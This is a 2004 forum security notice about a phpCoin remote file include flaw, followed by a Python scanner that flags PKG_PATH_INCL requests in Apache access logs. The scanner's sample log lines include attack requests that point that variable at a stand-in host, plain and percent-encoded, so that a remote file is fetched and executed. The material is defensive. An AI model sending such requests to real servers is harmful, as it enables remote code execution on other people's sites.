SECURITY ISSUE: phpCoin Remote File Include Vuln


Nov 29, 2004
The version of PHPCoin that comes with Fantastico is vulnerable to a remote file include vulnerability. What this means is that you can have an attacker essentially pull a file from another server and execute it on your server via PHPCoin.

Please see:

Now, to the best of my knowledge, you should never ever have anyone posting content to that file. So for those of us smart enough to run mod_security, toss this in your mod_security configuration.


That should take care of it until Fantastico/PHPCoin releases an update.

Chris Meisinger
WingSix Hosting

edit: Thanks to HalB on the cPanel IRC Channel for pointing this out to me.

Edit part 2: After a bit of playing with phpCoin, this can be executed through apparently any script in the coin_includes directory, so I've updated the modsec rule to filter that. Beforehand I was just filtering on a single file, now I'm just 403ing everything that uses the PKG_PATH_INCL var in the URL. I can't think of any good reason to include a var like that in a URL. heh
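The post's updated rule returns 403 for any request carrying the PKG_PATH_INCL variable in the URL. As an added example (not the poster's mod_security rule, which is not reproduced above), here is a small Python log scanner that applies the same condition to Apache combined-format access log lines, so an administrator can check past traffic for the pattern and confirm the rule is firing afterwards. It assumes the combined log format and matches the marker string PKG_PATH_INCL from the post after percent-decoding the query string; the log lines, addresses and paths are constructed for the example.

```python
import re
from urllib.parse import unquote

# Apache combined log format: ip ident user [time] "METHOD target PROTO" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The query variable the post's rule keys on (name taken from the post).
MARKER = "PKG_PATH_INCL"

# Constructed sample lines (not real traffic). Line 2 shows a hit that was
# served (200); line 3 shows the same thing, percent-encoded, after the
# mod_security rule was in place (403).
SAMPLE_LOG = """\
203.0.113.5 - - [29/Nov/2004:10:00:01 -0600] "GET /phpcoin/index.php?co=profile HTTP/1.1" 200 5123 "-" "Mozilla/4.0"
203.0.113.9 - - [29/Nov/2004:10:00:02 -0600] "GET /phpcoin/coin_includes/session_set.php?PKG_PATH_INCL=http://example.invalid/x.txt? HTTP/1.1" 200 0 "-" "curl/7.12"
203.0.113.9 - - [29/Nov/2004:10:00:03 -0600] "GET /phpcoin/coin_includes/db.php?PKG%5FPATH%5FINCL=http%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 403 0 "-" "curl/7.12"
203.0.113.7 - - [29/Nov/2004:10:00:04 -0600] "POST /phpcoin/mod.php?mod=login HTTP/1.1" 302 0 "-" "Mozilla/4.0"
"""


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_rfi_attempt(target):
    """True when the request target's query string carries PKG_PATH_INCL.

    The query is percent-decoded twice so that single- or double-encoded
    spellings of the variable name are still recognised; the match is
    case-insensitive, mirroring a filter that blocks any use of the variable.
    """
    _path, sep, query = target.partition("?")
    if not sep:
        return False
    decoded = unquote(unquote(query))
    return MARKER.lower() in decoded.lower()


def scan(log_text):
    """Scan log text and return one record per request that carries the variable."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not is_rfi_attempt(rec["target"]):
            continue
        path = rec["target"].split("?", 1)[0]
        hits.append({
            "ip": rec["ip"],
            "time": rec["ts"],
            "path": path,
            # The post notes any script under coin_includes/ is reachable this way.
            "in_coin_includes": "/coin_includes/" in path,
            # 403 here means the blocking rule handled the request.
            "status": int(rec["status"]),
        })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Run it against a real access log by passing the file contents to `scan()`; any hit with a non-403 status is a request that reached phpCoin before the rule was in place and is worth a closer look.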